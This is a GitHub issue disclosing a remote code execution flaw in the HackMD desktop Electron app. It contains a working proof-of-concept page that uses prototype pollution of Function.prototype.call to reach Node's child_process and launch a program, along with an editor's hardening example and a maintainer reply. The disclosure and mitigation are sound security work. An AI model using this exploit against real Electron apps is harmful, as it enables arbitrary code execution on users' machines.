hackmdio / hackmd-desktop

:notebook: HackMD Desktop Application

hackmd desktop remote code execution #20

Closed imagemlt closed 5 years ago

imagemlt commented 5 years ago

HackMD desktop uses an old version of Electron, in which we can use prototype pollution to get Node ability back in webviews without nodeIntegration.

poc:

<a href="http://127.0.0.1/gg.html">click me</a>

Here is the source code of gg.html:

<script>
// keep a reference to the original Function.prototype.call
Function.prototype.call2=Function.prototype.call;
// hook call: without context isolation this shared prototype is also used by
// Electron's own scripts, so the hook fires when one of them invokes a function
// with an object that has `.env` (the Node `process` object) as `this`
Function.prototype.call=function(...args){
    if(args[0]!=null && args[0]!=undefined && args[0].env!=undefined){
        // restore the original call, then use the leaked process object
        Function.prototype.call=Function.prototype.call2;
        args[0].mainModule.require('child_process').exec('open -a Calculator');
    }
    return this.call2(...args)
}
// reload so the page is re-initialised through the hooked call
location.reload();
</script>

When clicking on it we get a Calculator on Mac.

suggestions:
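Added editor's example, not part of the reporter's post and not hackmd-desktop's own code: the window settings that leave the page and Electron's scripts in one JavaScript world (so a polluted `Function.prototype.call` can reach `process`), beside a hardened set, plus the `will-navigate` and `will-attach-webview` guards from Electron's documented security checklist. It assumes the caller passes `require('electron').app` as `app`, and `ALLOWED_ORIGINS` is a constructed placeholder list.

```javascript
// Before: Node integration is off, but without contextIsolation page scripts
// share prototypes with Electron's internal scripts, which is what the PoC uses.
const WEAK_WEB_PREFERENCES = {
  nodeIntegration: false,
};

// After: contextIsolation gives page scripts a separate world, sandbox keeps the
// renderer out of Node, and the <webview> tag is disabled unless really needed.
const HARDENED_WEB_PREFERENCES = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webviewTag: false,
};

// Constructed placeholder: origins the app is allowed to navigate to in-window.
const ALLOWED_ORIGINS = ['https://hackmd.io'];

// Navigation guard: only the listed origins may be loaded; unparsable URLs fail.
function isAllowedNavigation(url) {
  try {
    return ALLOWED_ORIGINS.includes(new URL(url).origin);
  } catch (e) {
    return false;
  }
}

// Install guards on every WebContents the app creates (windows and webviews).
// `app` is expected to be require('electron').app (assumption, passed in by caller).
function installGuards(app) {
  app.on('web-contents-created', (_event, contents) => {
    // Block the in-window navigation to an attacker page (the "click me" link).
    contents.on('will-navigate', (event, url) => {
      if (!isAllowedNavigation(url)) event.preventDefault();
    });
    // If a <webview> is still attached, strip its preload, keep Node off,
    // force context isolation and refuse untrusted sources.
    contents.on('will-attach-webview', (event, webPreferences, params) => {
      delete webPreferences.preload;
      webPreferences.nodeIntegration = false;
      webPreferences.contextIsolation = true;
      if (!isAllowedNavigation(params.src)) event.preventDefault();
    });
  });
}
```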

imagemlt commented 5 years ago

any questions?

jackycute commented 5 years ago

Hi @imagemlt, thanks for reporting this issue and giving us a suggestion. We will investigate this soon.